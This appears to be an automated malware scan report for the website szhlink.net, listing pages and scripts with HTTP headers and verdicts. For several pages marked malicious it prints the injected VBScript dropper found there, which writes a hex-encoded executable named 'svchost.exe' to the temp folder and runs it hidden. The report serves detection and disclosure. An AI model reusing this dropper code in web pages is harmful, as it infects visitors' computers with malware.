Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=szhlink.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.szhlink.net/ | HTTP/1.1 200 OK Date: Mon, 22 Dec 2014 00:45:11 GMT Accept-Ranges: bytes ETag: "32b76093171bd01:2572" Server: Microsoft-IIS/6.0 Content-Length: 121430 Content-Location: http://www.szhlink.net/index.html Content-Type: text/html Last-Modified: Thu, 18 Dec 2014 23:08:46 GMT X-Died: timeout at scan.pm line 1566. X-Powered-By: ASP.NET | clean |
http://www.szhlink.net/index.html | 200 OK Content-Length: 121430 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.szhlink.net/include/dedeajax2.js | 200 OK Content-Length: 6962 Content-Type: application/x-javascript | clean |
http://www.szhlink.net/images/js/j.js | 200 OK Content-Length: 31018 Content-Type: application/x-javascript | clean |
http://www.szhlink.net/js/jquery.pack.js | 200 OK Content-Length: 71854 Content-Type: application/x-javascript | clean |
http://www.szhlink.net/js/jQuery.blockUI.js | 200 OK Content-Length: 18900 Content-Type: application/x-javascript | clean |
http://www.szhlink.net/js/jquery.SuperSlide.js | 200 OK Content-Length: 9381 Content-Type: application/x-javascript | clean |
http://www.szhlink.net/about/index.html | 200 OK Content-Length: 119858 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.szhlink.net/news/index.html | 200 OK Content-Length: 118653 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.szhlink.net/product/index.html | 200 OK Content-Length: 120571 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.szhlink.net/plus/list.php?tid=5 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 22 Dec 2014 00:45:32 GMT Location: /plus/jobs.php?lang=gb2312 Server: Microsoft-IIS/6.0 Content-Type: text/html; charset=utf-8 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 | clean |
http://www.szhlink.net/plus/jobs.php?lang=gb2312 | 200 OK Content-Length: 300760 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.szhlink.net/plus/list.php?tid=6 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 22 Dec 2014 00:45:36 GMT Location: /plus/guestbook.php?lang=gb2312 Server: Microsoft-IIS/6.0 Content-Type: text/html; charset=utf-8 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 | clean |
http://www.szhlink.net/plus/guestbook.php?lang=gb2312 | 200 OK Content-Length: 119546 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.szhlink.net/js/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: application/x-javascript | clean |
http://www.szhlink.net/js/formvalidator.js | 200 OK Content-Length: 18860 Content-Type: application/x-javascript | clean |
http://www.szhlink.net/js/formvalidatorregex.js | 200 OK Content-Length: 3836 Content-Type: application/x-javascript | clean |
http://www.szhlink.net/plus/mytag_js.php?aid=1 | 200 OK Content-Length: 114475 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: szhlink.net
Result:
GET / HTTP/1.1
Host: szhlink.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: szhlink.net
Referer: http://www.google.com/search?q=szhlink.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: szhlink.net
Referer: http://www.google.com/search?q=szhlink.net
Result:
The result is similar to the first query. There are no suspicious redirects found.